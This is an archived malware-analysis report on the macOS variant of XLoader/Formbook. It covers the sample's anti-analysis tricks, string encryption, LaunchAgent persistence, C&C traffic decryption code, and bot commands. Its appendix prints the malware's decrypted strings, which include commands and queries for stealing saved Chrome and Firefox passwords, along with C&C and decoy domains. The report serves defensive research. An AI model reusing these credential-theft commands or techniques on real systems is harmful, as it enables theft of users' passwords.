{
	"id": "4f6de577-2b77-48cf-a7e3-7236dec5a098",
	"created_at": "2026-04-06T01:31:59.765753Z",
	"updated_at": "2026-04-10T03:21:28.125361Z",
	"deleted_at": null,
	"sha1_hash": "72ab673986019c5a81d181a37dc91fab1ce79025",
	"title": "Time-proven tricks in a new environment: the macOS evolution of Formbook",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107506,
	"plain_text": "Time-proven tricks in a new environment: the macOS evolution of\r\nFormbook\r\nBy alexeybu\r\nPublished: 2021-07-27 · Archived: 2026-04-06 01:25:40 UTC\r\nBy: Alexey Bukhteyev \u0026 Raman Ladutska\r\nThe vast majority of threats for macOS are Adware such as Shlayer, Bundlore, Pirrit, and others. Compared to\r\nWindows, we only rarely encounter really harmful macOS malware that can steal sensitive data and cause serious\r\ndamage. It is even more dangerous when developers of malware for macOS draw on their successful experience\r\nfrom similar development for Windows.\r\nIn one of our recent researches, we found that Formbook, one of the most prevalent data stealers, is now sold in\r\nthe underground forum under a new name, XLoader, and has new capabilities that enable it to operate in macOS.\r\nXLoader ads in the underground forum\r\nFigure 1 – XLoader ads in the underground forum.\r\nHowever, until June 2021, we did not come across a single macOS sample of this malware in the wild. We\r\nmonitor a large number of macOS samples on a daily basis. Recently, we caught in our sandbox a suspicious\r\nmacOS sample that had zero detects on VirusTotal:\r\nmacOS malicious sample with zero detects on VirusTotal\r\nFigure 2 – macOS malicious sample with zero detects on VirusTotal.\r\nThe network traffic generated by this sample appeared to be very similar to something we saw previously:\r\nNetwork traffic generated by XLoader for macOS\r\nFigure 3 – Network traffic generated by XLoader for macOS.\r\nWe checked in our malware database and easily found an XLoader sample for Windows with the same campaign\r\nid “09rb” that generates similar network traffic:\r\nNetwork traffic generated by XLoader for\r\nWindows\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 1 of 15\n\nFigure 4 – Network traffic generated by XLoader for Windows.\r\nIn this article, we present detailed analysis of the malicious macOS sample we found and its features. The anti-analysis tricks, encryption, network communication, and the list of supported commands leave us in no doubt: we\r\ngot our hands on an XLoader variant for macOS, which is really similar to Formbook malware.\r\nAnti-analysis techniques\r\nThe XLoader binary doesn’t have any imports except dlsym(). Function names are stored in two encrypted\r\nbuffers. XLoader decrypts the names of the required functions and resolves their addresses using the dlsym()\r\nfunction:\r\nmacOS XLoader anti-analysis techniques\r\nFigure 5 – macOS XLoader anti-analysis techniques.\r\nAt the initialization stage, XLoader implements a simple ptrace-based anti-debugging technique:\r\nmacOS XLoader anti-debugging technique\r\nFigure 6 – macOS XLoader anti-debugging technique.\r\nEncrypted strings\r\nMost of the text strings used by the malware, such as HTTP headers and filenames, as well as the URL of its C\u0026C\r\nserver, are encrypted and stored inside the buffers of a special form (so called “encbufs”). The encryption scheme\r\nis very similar to the one used in Formbook and XLoader for Windows, but the macOS version of XLoader has\r\nsome distinguishing features.\r\nIn Formbook and both variants of XLoader, every encrypted buffer is prepended by a small function that is used to\r\naccess the buffer. Some of the encrypted buffers contain data, while the other buffers contain a key used for\r\ndecrypting other buffers.\r\nThe buffers containing the encrypted data and the keys are designed to look like valid function assembly code,\r\nwith a prologue and the “retn” instruction at the end:\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 2 of 15\n\nFormbook and macOS XLoader encrypted buffers\r\nFigure 7 – Formbook and macOS XLoader encrypted buffers.\r\nFirst, every buffer is passed to the decoding function, which removes the fake prologue, and extra bytes are added\r\nto make the data look like assembly code. XLoader for macOS is 64-bit executable; therefore, the decoding\r\nfunction is implemented for x64 assembly, while the XLoader version for Windows uses x86 assembly.\r\nThe decoded buffer that contains the encrypted data is then passed to the modified RC4 function. In all variants of\r\nFormbook and XLoader, this function is equivalent to the following C-code:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nvoid mod_rc4_decrypt(BYTE *buff, unsigned int buff_len, BYTE *key)\r\n{\r\nint i;\r\nfor (i = buff_len - 1; i \u003e 0; i--)\r\nbuff[i - 1] -= buff[i];\r\nfor (i = 0; i \u003c buff_len - 1; i++)\r\nbuff[i] -= buff[i + 1];\r\nRC4(buff, buff_len, key, 20);\r\nfor (i = buffer_len - 1; i \u003e 0; i--)\r\nbuff[i - 1] -= buff[i];\r\nfor (i = 0; i \u003c buff_len - 1; i++)\r\nbuff[i] -= buff[i + 1];\r\n}\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 3 of 15\n\nvoid mod_rc4_decrypt(BYTE *buff, unsigned int buff_len, BYTE *key) { int i; for (i = buff_len - 1; i \u003e 0; i--)\r\nbuff[i - 1] -= buff[i]; for (i = 0; i \u003c buff_len - 1; i++) buff[i] -= buff[i + 1]; RC4(buff, buff_len, key, 20); for (i =\r\nbuffer_len - 1; i \u003e 0; i--) buff[i - 1] -= buff[i]; for (i = 0; i \u003c buff_len - 1; i++) buff[i] -= buff[i + 1]; }\r\nvoid mod_rc4_decrypt(BYTE *buff, unsigned int buff_len, BYTE *key)\r\n{\r\n int i;\r\n \r\n for (i = buff_len - 1; i \u003e 0; i--)\r\n buff[i - 1] -= buff[i];\r\n for (i = 0; i \u003c buff_len - 1; i++)\r\n buff[i] -= buff[i + 1];\r\n \r\n RC4(buff, buff_len, key, 20);\r\n \r\n for (i = buffer_len - 1; i \u003e 0; i--)\r\n buff[i - 1] -= buff[i];\r\n for (i = 0; i \u003c buff_len - 1; i++)\r\n buff[i] -= buff[i + 1];\r\n}\r\nThe decryption flow for encrypted buffers is rather complicated and it’s easier to visualize in a diagram:\r\nDecryption of the data buffers in XLoader for\r\nmacOS\r\nFigure 8 – Decryption of the data buffers in XLoader for macOS.\r\nThe “layer2_keys” from the diagram above are calculated individually for each encrypted buffer using the\r\nfollowing algorithm:\r\nDeriving decryption keys for encrypted buffers\r\nFigure 9 – Deriving decryption keys for encrypted buffers.\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 4 of 15\n\nIn the XLoader version for Windows, the encryption scheme remains the same as it was in Formbook, except for\r\nthe number and the purpose of the encrypted buffers.\r\nPersistence\r\nIn its initial run, the malware copies itself into the newly created, randomly named hidden folder in the user’s\r\nhome directory. The name of the application and of the executable binary is randomized as well. For example:\r\n/Users/user/.wznlVRt83Jsd/HPyT0b4Hwxh.app/Contents/MacOS/HPyT0b4Hwxh\r\nThe malware creates an Info.plist file for the new application bundle using the template extracted from one of the\r\nencrypted buffers. Then, in a separate thread, XLoader runs its copy from the new path.\r\nXLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current\r\nuser:\r\n/Users/user/Library/LaunchAgents/com.wznlVRt83Jsd.HPyT0b4Hwxh.plist\r\nAfter the installation is complete, XLoader stops execution while it continues its malicious activity in the child\r\nprocess.\r\nMalware configuration\r\nXLoader has two buffers in which it stores addresses used to search its C\u0026C server. One of the buffers contains an\r\naddress of a real C\u0026C server in the following format:\r\nwww.iregentos[.]info/09rb/\r\nAnother buffer contains a list of decoy domains. This means that the domains from this list don’t host a real C\u0026C\r\npanel and are only used to mask the real C\u0026C communication.\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 5 of 15\n\nmacOS XLoader decrypted buffer contain a list of\r\n64 decoy domains and the C\u0026C URI\r\nFigure 10 – macOS XLoader decrypted buffer contain a list of 64 decoy domains and the C\u0026C URI.\r\nXLoader randomly chooses 16 of the 64 domain names and creates a list of URIs using the campaign id:\r\nwww.briannanbrown[.]com/09rb/ www.franciscobueno[.]guru/09rb/ …\r\nXLoader randomly chooses 16 of 64 decoy\r\ndomains\r\nFigure 11 – XLoader randomly chooses 16 of 64 decoy domains.\r\nIn the created list, a random URI is replaced with the main URI extracted from the first buffer:\r\nXLoader inserts the address of the C\u0026C server\r\ninto a random place in the list\r\nFigure 12 – XLoader inserts the address of the C\u0026C server into a random place in the list.\r\nTherefore, every time the malware runs, the created list always contains the URI from the first buffer, while the\r\nother URIs can change.\r\nThis is different from the XLoader version for Windows in which the address of a real C\u0026C server is contained in\r\nthe list of “decoys.” However, we should emphasize that the XLoader versions for macOS and the Windows for\r\nthe campaign “09rb” share the same real C\u0026C server “www.iregentos[.]info”.\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 6 of 15\n\nC\u0026C communication\r\nAt first glance, if we look at the encrypted XLoader communication, we don’t see any difference in comparison to\r\nFormbook. For C\u0026C communication, XLoader uses the HTTP protocol and sends data using GET or POST\r\nrequests, depending on the kind of data.\r\nXLoader sends beaconing requests in a loop while the malware is running. The requests look like this:\r\nGET /vpz6/?\r\nTl=tDdHvn8X6rT\u0026qF7xr2rx=Rva7WvGfqee/ASq4k5lYe0dVNkfCuS3Tauh/YI8ic9vhGQpK/u62RmZZV0B\r\nHTTP/1.1 Host: www.bostonm[.info Connection: close\r\nXLoader sends the data in one of the values of the query string in BASE64-encoded form. The keys in the query\r\nstring are randomly generated and don’t contain useful data.\r\nAs opposed to Formbook, which uses one layer of RC4 encryption, in XLoader the data is RC4-encrypted in two\r\nlayers. The key for the internal layer of encryption is calculated from the C2 URL using its own implementation of\r\nSHA1 with reversed DWORD endianness. The key for the second layer of encryption is calculated from one of\r\nthe encrypted buffers extracted from the configuration (common_c2_key) using the modified RC4 cypher (see\r\nmod_rc4_decrypt above) and the previously calculated SHA1 for the URI.\r\nTo decrypt an XLoader request, we can use this algorithm:\r\n1. Decode the value from the query string using BASE64:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nencrypted_data =\r\nbase64.b64decode(\"Rva7WvGfqee/ASq4k5lYe0dVNkfCuS3TauhC/YI8ic9vhGQpK/u62RmZZV0B\")\r\n#46f6bb5af19fa9e7bf012ab89399587b47553647c2b92dd36ae842fd823c89cf6f8464292bfbbad91999655d01\r\nencrypted_data =\r\nbase64.b64decode(\"Rva7WvGfqee/ASq4k5lYe0dVNkfCuS3TauhC/YI8ic9vhGQpK/u62RmZZV0B\")\r\n#46f6bb5af19fa9e7bf012ab89399587b47553647c2b92dd36ae842fd823c89cf6f8464292bfbbad91999655d01\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 7 of 15\n\nencrypted_data = base64.b64decode(\"Rva7WvGfqee/ASq4k5lYe0dVNkfCuS3TauhC/YI8ic9vhGQpK/u62RmZZV0B\")\r\n#46f6bb5af19fa9e7bf012ab89399587b47553647c2b92dd36ae842fd823c89cf6f8464292bfbbad91999655d01\r\n2. Calculate the c2_layer1_key using modified SHA1:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nh = sha1(b\"www.bostonm.info/vpz6/\").digest()\r\nc2_layer1_key = b\"\".join([struct.pack(\"\u003eI\", x) for x in struct.unpack(\"\u003cIIIII\", h)]) #\r\nf36e72e54647ffa7187046d3e035d0bd9d10c3c2\r\nh = sha1(b\"www.bostonm.info/vpz6/\").digest() c2_layer1_key = b\"\".join([struct.pack(\"\u003eI\", x) for x in\r\nstruct.unpack(\"\u003cIIIII\", h)]) # f36e72e54647ffa7187046d3e035d0bd9d10c3c2\r\nh = sha1(b\"www.bostonm.info/vpz6/\").digest()\r\nc2_layer1_key = b\"\".join([struct.pack(\"\u003eI\", x) for x in struct.unpack(\"\u003cIIIII\", h)]) # f36e72e54647f\r\n3. Decode the common_c2_key extracted from one of the encrypted buffers:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\ncommon_c2_key = decode_encbuf(encbuf9)\r\n# 0cbe4d36992df082c2efc4ec41a9ed571cbf14e9\r\ncommon_c2_key = decode_encbuf(encbuf9) # 0cbe4d36992df082c2efc4ec41a9ed571cbf14e9\r\ncommon_c2_key = decode_encbuf(encbuf9)\r\n# 0cbe4d36992df082c2efc4ec41a9ed571cbf14e9\r\n4. Decrypt the common_c2_key using mod_rc4_decrypt (see above) with the c2_layer1_key to get\r\nc2_layer2_key:\r\nPlain text\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 8 of 15\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nc2_layer2_key = mod_rc4_decrypt(common_c2_key, c2_layer1_key)\r\n# 00ad36f49703cee9023498d594df3b2e568ca3d2\r\nc2_layer2_key = mod_rc4_decrypt(common_c2_key, c2_layer1_key) #\r\n00ad36f49703cee9023498d594df3b2e568ca3d2\r\nc2_layer2_key = mod_rc4_decrypt(common_c2_key, c2_layer1_key)\r\n# 00ad36f49703cee9023498d594df3b2e568ca3d2\r\n5. Decrypt the external layer using RC4 with the c2_layer2_key:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\ninternal_layer = ARC4.new(c2_layer2_key).decrypt(encrypted_data)\r\n#901975c550a7d567ef93b4fdce0324aa9650561b567f4b73cb7da8549b83a84d1f181839155a4c86ee957cdf09\r\ninternal_layer = ARC4.new(c2_layer2_key).decrypt(encrypted_data)\r\n#901975c550a7d567ef93b4fdce0324aa9650561b567f4b73cb7da8549b83a84d1f181839155a4c86ee957cdf09\r\ninternal_layer = ARC4.new(c2_layer2_key).decrypt(encrypted_data)\r\n#901975c550a7d567ef93b4fdce0324aa9650561b567f4b73cb7da8549b83a84d1f181839155a4c86ee957cdf09\r\n6. Decrypt the internal layer using RC4 with the c2_layer1_key:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\ndecrypted = ARC4.new(c2_layer1_key).decrypt(internal_layer)\r\n# 'XLNG:572E4DF71.1:OS X 10.14.0 Mojave:cm9vdA=='\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 9 of 15\n\ndecrypted = ARC4.new(c2_layer1_key).decrypt(internal_layer) # 'XLNG:572E4DF71.1:OS X 10.14.0\r\nMojave:cm9vdA=='\r\ndecrypted = ARC4.new(c2_layer1_key).decrypt(internal_layer)\r\n# 'XLNG:572E4DF71.1:OS X 10.14.0 Mojave:cm9vdA=='\r\nIn XLoader for Windows, the common_c2_key value is additionally encrypted with another key stored in the\r\nconfiguration. Therefore, decrypting the communication of XLoader for Windows is a little bit harder.\r\nAfter decrypting the data, we get the string which is sent in the beaconing message. The data format is similar to\r\nthat in the Formbook malware:\r\nXLNG:572E4DF71.1:OS X 10.14.0 Mojave:cm9vdA==\r\nWhere:\r\n“XLNG” – Magic bytes for XLoader.\r\n“572E4DF7” – Bot unique id, calculated as the CRC32/Bzip2 checksum of the 32-byte buffer containing\r\nthe current user name and the common_c2_key (this can be used for validating the bot, but likely used\r\nonly for bot identification).\r\n“1.1” – The malware version.\r\n“OS X 10.14.0 Mojave” – OS version.\r\n“cm9vdA==” – The base64-encoded user name (“root” in this case).\r\nAll other data that is sent by the bot or by a C\u0026C server is RC4-encrypted in 2 layers and base64-encoded as well.\r\nOther than that, the C\u0026C communication of the macOS XLoader malware is very similar to the Formbook\r\ncommunication.\r\nIf there are any commands for the bot, the C\u0026C server replies with the data in the HTTP response body.\r\nThe decrypted response starts and ends with the “XLNG” magic string and has the following format:\r\nXLNG4http://maliciouswebsite.comXLNG\r\nWhere:\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 10 of 15\n\n“4” – Command code (“Visit URL” in this case).\r\n“http://maliciouswebsite.com” – Command payload.\r\nXLoader supports the following commands that are very similar to Formbook commands:\r\n1 Download and execute file\r\n2 Update bot\r\n3 Uninstall bot\r\n4 Visit URL\r\n5 Clear cookies\r\n6 Recover passwords (Firefox, Chrome)\r\n7 Shutdown\r\n8 Reboot\r\n9 Download and unpack a zip archive with NSS3 library, recover Firefox passwords\r\nLet’s take a closer look at some of these commands and their implementation details.\r\nDownload and execute file\r\nThe content of the file to execute is sent in the message body (after “XLNG1“). Before the terminating “XLNG”\r\nmagic sequence, the file extension is also provided. XLoader creates a file with a random name and the specified\r\nextension inside of the current user’s home directory. For example:\r\n/Users/user/5JCLglq.sh\r\nThe stored file is then executed using the system() function and the command line “open [filename]”.\r\nVisit URL\r\nXLoader executes the shell command “open [URL]” when it receives this command.\r\nFirefox password recovery\r\nTo get Firefox profiles, XLoader enumerates sub-folders in the “/Library/Application Support/Firefox/Profiles”\r\nfolder. For each subfolder, XLoader opens the file “/Library/Application\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 11 of 15\n\nSupport/Firefox/Profiles/[prfile_name]/logins.json”. XLoader decrypts the data from the “logins.json” files\r\nusing the function “PK11SDR_Decrypt” from the “libnss3.dylib” library.\r\nChrome password recovery\r\nXLoader obtains saved Chrome passwords from the SQLite database located in “/Library/Application\r\nSupport/Google/Chrome/Default/Login Data” using the same algorithm described here.\r\nFirst, it retrieves encrypted passwords from the Chrome SQLite database using the following query:\r\nSELECT origin_url, username_value, password_value FROM logins\r\nThen it derives the decryption key:\r\nXLoader obtains the decryption key for the\r\nChrome SQLite database\r\nFigure 13 – XLoader obtains the decryption key for the Chrome SQLite database.\r\nFinally, it decrypts the passwords using openssl:\r\nXLoader decrypts Chrome passwords using\r\nopenssl\r\nFigure 14 – XLoader decrypts Chrome passwords using openssl.\r\nConclusion\r\nThe Formbook/XLoader malware has been a prominent threat for Windows users for more than five years.\r\nRecently, this malware has begun to affect macOS users as well. With approximately 200 million macOS users\r\nworldwide, this is definitely a promising new market for Xloader’s creators. We found malicious samples for both\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 12 of 15\n\nWindows and macOS in the wild, with the same configuration and that contact the same C\u0026C servers. This allows\r\nattackers to control infected Windows and macOS machines from a single point.\r\nThe malware authors clearly drew upon their experience in Windows malware development, taking the existing\r\nFormbook codebase as a core for a new XLoader macOS version. The malware’s use of anti-analysis tricks,\r\nobfuscation techniques and communication encryption all significantly complicate malware analysis and helped\r\nXLoader go unnoticed for a long time. We are constantly monitoring this evolving threat and provide Check Point\r\ncustomers with the relevant protections.\r\nAppendix A: Indicators of Compromise\r\nSHA256:\r\n97d6b194da410db82d9974aec984cff8ac0a6ad59ec72b79d4b2a4672b5aa8aa\r\n46adfe4740a126455c1a022e835de74f7e3cf59246ca66aa4e878bf52e11645d\r\nMD5:\r\na17bf4533d7ec677a0d4bdae19e41ff2\r\n997af06dda7a3c6d1be2f8cac866c78c\r\nC\u0026C server:\r\nwww.iregentos[.]info/09rb/\r\nAppendix B: Decrypted Buffers\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 13 of 15\n\n“buffer1_1480_strings”: [‘libobjc.A.dylib’, ‘libSystem.B.dylib’, ‘libsqlite3.0.dylib’,\r\n‘libcrypto.dylib’, ‘libnss3.dylib’, ‘Cocoa’, ‘AppKit’, ‘CoreData’, ‘Foundation’, ‘CoreServices’,\r\n‘CoreFoundation’, ‘ApplicationServices’, ‘.framework/Versions/’,\r\n‘/System/Library/Frameworks/’, ‘/Library/LaunchAgents/com.’,\r\n‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’,\r\n‘kern.osrelease’, ‘Puma’, ‘Jaguar’, ‘Panther’, ‘Tiger’, ‘Leopard’, ‘Snow Leopard’, ‘Lion’,\r\n‘Mountain Lion’, ‘Mavericks’, ‘Yosemite’, ‘El Capitan’, ‘Sierra’, ‘High Sierra’, ‘Mojave’,\r\n‘Catalina’, ‘persistent’, ‘\\r\\nConnection: close\\r\\n\\r\\n’, ‘POST ‘, ‘ HTTP/1.1\\r\\n’, ‘Host: ‘,\r\n‘\\r\\nConnection: close\\r\\n’, ‘Content-Length: ‘, ‘\\r\\nCache-Control: no-cache\\r\\n’, ‘Origin:\r\nhttp://’, ‘\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)\r\nAppleWebKit/603.3.8 (KHTML, like Gecko)’, ‘\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n’, ‘Accept: */*\\r\\n’, ‘Referer: http://’, ‘\\r\\nAccept-Language: en-US’, ‘\\r\\nAccept-Encoding: gzip, deflate\\r\\n\\r\\ndat=’, ‘osascript -e \\’tell app “System Events” to shut down\\”,\r\n‘osascript -e \\’tell app “System Events” to restart\\”, ‘/Library/Application\r\nSupport/Google/Chrome/Default/Login Data’, ‘/Library/Application Support/Firefox/Profiles’,\r\n‘SELECT origin_url, username_value, password_value FROM logins’, “security find-generic-password -wa ‘Chrome'”, “openssl enc -base64 -d -aes-128-cbc -iv\r\n‘20202020202020202020202020202020’ -K “, ‘/Applications/Firefox.app/Contents/MacOS’,\r\n‘DYLD_LIBRARY_PATH’, ‘Username: ‘, ‘Password: ‘, ‘formSubmitURL’, ‘usernameField’,\r\n‘encryptedUsername’, ‘encryptedPassword’, ‘\\\\logins.json’, ‘\\\\signons.sqlite’]\r\n“buffer2_874_funcnames”: [‘exit’, ‘open’, ‘read’, ‘write’, ‘dlsym’, ‘dlopen’, ‘geteuid’,\r\n‘getpwuid’, ‘vm_region’, ‘vm_protect’, ‘vm_allocate’, ‘vm_deallocate’, ‘mach_task_self’,\r\n‘shm_open’, ‘shm_unlink’, ‘sysctlbyname’, ‘usleep’, ‘arc4random’, ‘stat’, ‘fstat’, ‘mkdir’,\r\n‘remove’, ‘system’, ‘_close’, ‘chmod’, ‘ptrace’, ‘pthread_create’, ‘gethostuuid’, ‘getenv’,\r\n‘setenv’, ‘execv’, ‘kill’, ‘getpid’, ‘mmap’, ‘ftruncate’, ‘proc_listpids’, ‘proc_pidinfo’, ‘popen’,\r\n‘pclose’, ‘fscanf’, ‘opendir’, ‘readdir’, ‘closedir’, ‘_CFRelease’, ‘_CFStringGetCStringPtr’,\r\n‘_CFStringCreateWithCString’, ‘_CFUserNotificationDisplayAlert’, ‘objc_getClass’,\r\n‘objc_msgSend’, ‘sel_registerName’, ‘_AXUIElementCreateApplication’,\r\n‘_AXUIElementCopyAttributeValue’, ‘sqlite3_open’, ‘sqlite3_step’, ‘sqlite3_prepare_v2’,\r\n‘sqlite3_column_text’, ‘sqlite3_column_blob’, ‘sqlite3_column_bytes’,\r\n‘PKCS5_PBKDF2_HMAC_SHA1’, ‘NSS_Init’, ‘NSS_Shutdown’, ‘PK11_FreeSlot’,\r\n‘PK11SDR_Decrypt’, ‘PK11_Authenticate’, ‘PK11_GetInternalKeySlot’]\r\n“buffer3_68_funcnames”: [‘htons’, ‘socket’, ‘setsockopt’, ‘getaddrinfo’, ‘send’, ‘recv’,\r\n‘connect’, ‘close’]\r\n“buffer4_1201_decoys”: [‘anabelenfunes.com’, ‘cmdp0o7mi0-e.info’, ‘briannanbrown.com’,\r\n‘drlindaydevenish.com’, ‘my6method.com’, ‘franciscobueno.guru’, ‘326ec.com’,\r\n‘dutythrow.com’, ‘sdqz114.com’, ‘kikibeautyspace.com’, ‘fashionsbyfluff.com’,\r\n‘nctichurch.com’, ‘hiphopjewelrybling.com’, ‘pressuakickz.com’, ‘hansonwedding2020.com’,\r\n‘ssmjoin.com’, ‘thebinshaker.com’, ‘copytoronto.icu’, ‘newsshortage.com’, ‘noaccountbet-ci.com’, ‘vip72.club’, ‘je-tecengineering.com’, ‘fjdjkrjkfjkde.com’, ‘rshuahui.com’,\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 14 of 15\n\n‘pgmedicaloxygencentre.com’, ‘primarycarewestpalmbeach.com’, ‘certificationbuilders.com’,\r\n‘nikkisellsnv.com’, ‘vrcadearena.com’, ‘intrastreamer.com’, ‘sbhardwoodlumber.com’,\r\n‘corpsecorral.com’, ‘autoprestige24.com’, ‘exploringelleblog.com’, ‘newrayfreight.com’,\r\n‘natchbricks.com’, ‘weyeny.com’, ‘relexoo.space’, ‘thedoubletwelve.com’, ‘clinclan.com’,\r\n‘damndawgleads.com’, ‘adhyashaktiastro.com’, ‘yavuzisitme.net’, ‘decoratudo.com’,\r\n‘furnishyourhomes.com’, ‘askmohsin.com’, ‘forlgiss.net’, ‘electricbrandsusa.com’,\r\n‘twotiredbikeshop.com’, ‘shopmasstrim.com’, ‘siderplan.com’, ‘originalwebcreations.com’,\r\n‘parcel-rix.info’, ‘lidokeyhomes.info’, ‘theremedy-project.com’, ‘ugt6bpz6ucg.net’,\r\n‘unclejoemomala.com’, ‘aika-prod.com’, ‘platinumbullion.net’, ‘idahosothebys.com’,\r\n‘wellnessmywaynow.com’, ‘hypesoleco.com’, ‘lionzmf.info’, ‘zincfacemask.com’]\r\n“buffer5_34_c2_url”: [‘www.iregentos[.]info/09rb/’, ‘/09rb/’]\r\nSource: https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nhttps://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/\r\nPage 15 of 15\n\n‘unclejoemomala.com’, ‘wellnessmywaynow.com’, ‘aika-prod.com’, ‘hypesoleco.com’, ‘platinumbullion.net’, ‘lionzmf.info’, ‘idahosothebys.com’, ‘zincfacemask.com’]\n“buffer5_34_c2_url”: [‘www.iregentos[.]info/09rb/’, ‘/09rb/’]\nSource: https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/  \n  Page 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/"
	],
	"report_names": [
		"time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook"
	],
	"threat_actors": [],
	"ts_created_at": 1775439119,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72ab673986019c5a81d181a37dc91fab1ce79025.pdf",
		"text": "https://archive.orkl.eu/72ab673986019c5a81d181a37dc91fab1ce79025.txt",
		"img": "https://archive.orkl.eu/72ab673986019c5a81d181a37dc91fab1ce79025.jpg"
	}
}